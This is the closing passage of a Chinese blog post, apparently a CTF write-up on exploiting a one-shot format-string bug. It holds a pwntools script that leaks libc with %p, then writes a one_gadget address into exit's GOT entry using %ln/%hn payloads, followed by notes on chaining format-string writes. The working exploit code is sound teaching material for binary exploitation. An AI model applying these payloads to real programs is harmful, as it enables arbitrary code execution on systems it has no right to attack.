        payload1 += <span class="string">b&#x27;-%17$p&#x27;</span>

        <span class="comment"># debug(&#x27;b *0x401366&#x27;)</span>
        sla(<span class="string">b&#x27;Please leave your message: &#x27;</span>, payload1) 
        ru(<span class="string">b&#x27;0x&#x27;</span>)
        libc_base = <span class="built_in">int</span>(r(<span class="number">12</span>), <span class="number">16</span>) - <span class="number">243</span> - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]
        one_gadegt = [<span class="number">0xe3afe</span>, <span class="number">0xe3b01</span>, <span class="number">0xe3b04</span>]
        one = libc_base + one_gadegt[<span class="number">1</span>]

        ori  = one&<span class="number">0xffff</span>
        ori1 = one>><span class="number">16</span>&<span class="number">0xffff</span>  
        ori2 = one>><span class="number">32</span>&<span class="number">0xffff</span>
        ori3 = one&<span class="number">0xffffffff</span>
        leak(<span class="string">"one_gadet"</span>, one)
        <span class="built_in">print</span>(<span class="built_in">hex</span>(ori))
        <span class="built_in">print</span>(<span class="built_in">hex</span>(ori1))
        <span class="built_in">print</span>(<span class="built_in">hex</span>(ori2))

        <span class="keyword">if</span>(ori < ori1 <span class="keyword">or</span> ori1 < ori2):
            log.failure(<span class="string">"ori is too low..."</span>)
            io.close()
            <span class="keyword">continue</span>
        <span class="keyword">else</span> :
            payload2  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got+<span class="number">2</span>-<span class="number">35</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">35</span> + <span class="string">b&#x27;%ln\x00&#x27;</span>  <span class="comment">#37</span>
            <span class="comment"># payload2 = b&#x27;\x00&#x27;</span>
            sla(<span class="string">b&#x27;Please leave your message: &#x27;</span>, payload2) 
            <span class="comment"># debug(&#x27;b *0x401366&#x27;)</span>

            payload3 = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(exit_got+<span class="number">4</span>-<span class="number">14</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">14</span> + <span class="string">b&#x27;%ln\x00&#x27;</span>   <span class="comment">#16</span>
            <span class="comment"># payload3 = b&#x27;\x00&#x27;</span>
            <span class="comment"># debug(&#x27;b *0x401366&#x27;)</span>
            sla(<span class="string">b&#x27;Please leave your message: &#x27;</span>, payload3) 

            payload4  = <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(ori2-<span class="number">38</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">38</span> + <span class="string">b&#x27;%hn&#x27;</span>       <span class="comment">#40-->4  7fxx   82-->2  xxxx    85-->0   xxxx</span>
            payload4 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(ori1-ori2-<span class="number">40</span>).encode(<span class="string">"utf-8"</span>) + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span>*<span class="number">40</span> + <span class="string">b&#x27;%hn&#x27;</span> 
            payload4 += <span class="string">b&#x27;%&#x27;</span> + <span class="built_in">str</span>(ori-ori1-<span class="number">1</span>).encode(<span class="string">"utf-8"</span>)   + <span class="string">b&#x27;c&#x27;</span> + <span class="string">b&#x27;%c&#x27;</span> + <span class="string">b&#x27;%hn&#x27;</span> 
            payload4 += <span class="string">b&#x27;\x00&#x27;</span> 

            <span class="comment"># debug(&#x27;b *0x401366&#x27;)</span>
            sla(<span class="string">b&#x27;Please leave your message: &#x27;</span>, payload4) 
            <span class="built_in">print</span>(payload4)
            itr()
</code></pre>



<p><img src="https://cdn.jsdelivr.net/gh/tw11ty/MyPic/img202406081607924.png" alt="image-20240608160741823"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结:"></a>总结:</h2><ol>
<li>一次性格式化除非是给了backdoor或者libc基地址，否则一次性是很难打通的，当然不排除一些奇奇怪怪的题目。基本上只给了一个一次性格式化利用的话，都需要构造出第二次利用，无论是改got、fini_array、printf_ret、ret_addr。</li>
<li>栈上格式化字符串直接写地址改数据，非栈上格式化字符串改指针间接改数据</li>
</ol>
<h2 id="一些思考"><a href="#一些思考" class="headerlink" title="一些思考"></a>一些思考</h2><blockquote>
<p>有群u在群里请教了为什么不能用$符号定位使用两次，然后在一条链子上改两次，我在上面的das签到题里面有了些自己的测试，不过还是不如群里的大佬理解得透彻。</p>
<p>自己整理了一下<a target="_blank" rel="noopener" href="https://www.cnblogs.com/9man/p/18228214">.N1nEmAn</a>师傅所说的原理：打格式化字符串时，使用$符号作为索引，会将栈的上下文保存到堆上，第一次使用$符号修改目标能正常修改栈上数据，但是堆上的数据没有变，而下次再使用$符号作为索引，会到堆里面去进行修改，而不是在栈上直接修改。这就是为什么不能在同一条链子上改两次。后面也有<a target="_blank" rel="noopener" href="https://blog.wjhwjhn.com/posts/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">WJH</a>师傅贴出的博客，里面是WJH师傅对printf的源码分析。这就是与大佬们学习的差距吗，再接再厉！</p>
</blockquote>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/fmt/" rel="tag"># fmt</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/06/06/hello-world/" rel="prev" title="Hello World">
                  <i class="fa fa-angle-left"></i> Hello World
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/06/10/the-end/" rel="next" title="the_end">
                  the_end <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">kkkk</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="Word count total">87k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="Reading time total">1:19</span>
  </span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.6.0/pjax.min.js" integrity="sha256-vxLn1tSKWD4dqbMRyv940UYw4sXgMtYcK6reefzZrao=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.31/fancybox/fancybox.umd.js" integrity="sha256-a+H7FYzJv6oU2hfsfDGM2Ohw/cR9v+hPfxHCLdmCrE8=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/medium-zoom/1.1.0/medium-zoom.min.js" integrity="sha256-ZgMyDAIYDYGxbcpJcfUnYwNevG/xi9OHKaR/8GK+jWc=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pangu/4.0.7/pangu.min.js" integrity="sha256-j+yj56cdEY2CwkVtGyz18fNybFGpMGJ8JxG3GSyO2+I=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script><script src="/js/pjax.js"></script>

  



  <script src="/js/third-party/fancybox.js"></script>



  




  <script src="https://cdnjs.cloudflare.com/ajax/libs/quicklink/2.3.0/quicklink.umd.js" integrity="sha256-yvJQOINiH9fWemHn0vCA5lsHWJaHs6/ZmO+1Ft04SvM=" crossorigin="anonymous"></script>
  <script class="next-config" data-name="quicklink" type="application/json">{"enable":"enable","home":"enable","archive":"enable","delay":true,"timeout":3000,"priority":true,"url":"http://example.com/2024/06/08/%E4%B8%80%E6%AC%A1%E6%80%A7%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%88%A9%E7%94%A8/"}</script>
  <script src="/js/third-party/quicklink.js"></script>

</body>
</html>
